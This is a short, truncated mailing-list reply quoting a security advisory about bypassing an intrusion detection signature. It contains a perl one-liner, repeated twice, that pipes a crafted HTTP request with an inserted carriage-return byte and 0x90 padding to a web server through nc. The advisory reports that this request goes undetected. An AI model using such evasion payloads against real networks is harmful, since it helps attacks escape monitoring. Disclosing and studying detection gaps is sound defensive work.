Sigint Consulting said:
> However we can once again bypass this by including our CR character
> before our string like so:
>
> perl -e 'print "GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"'|nc
> 192.168.1.3 80
>
> No alert is generated from the string above.
> However we can once again bypass this by including our CR character
> before our string like so:
>
> perl -e 'print "GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"'|nc
> 192.168.1.3 80
>
> No alert is generated from the string above.
[...]
> We are not sure how much this ma...
[ more ]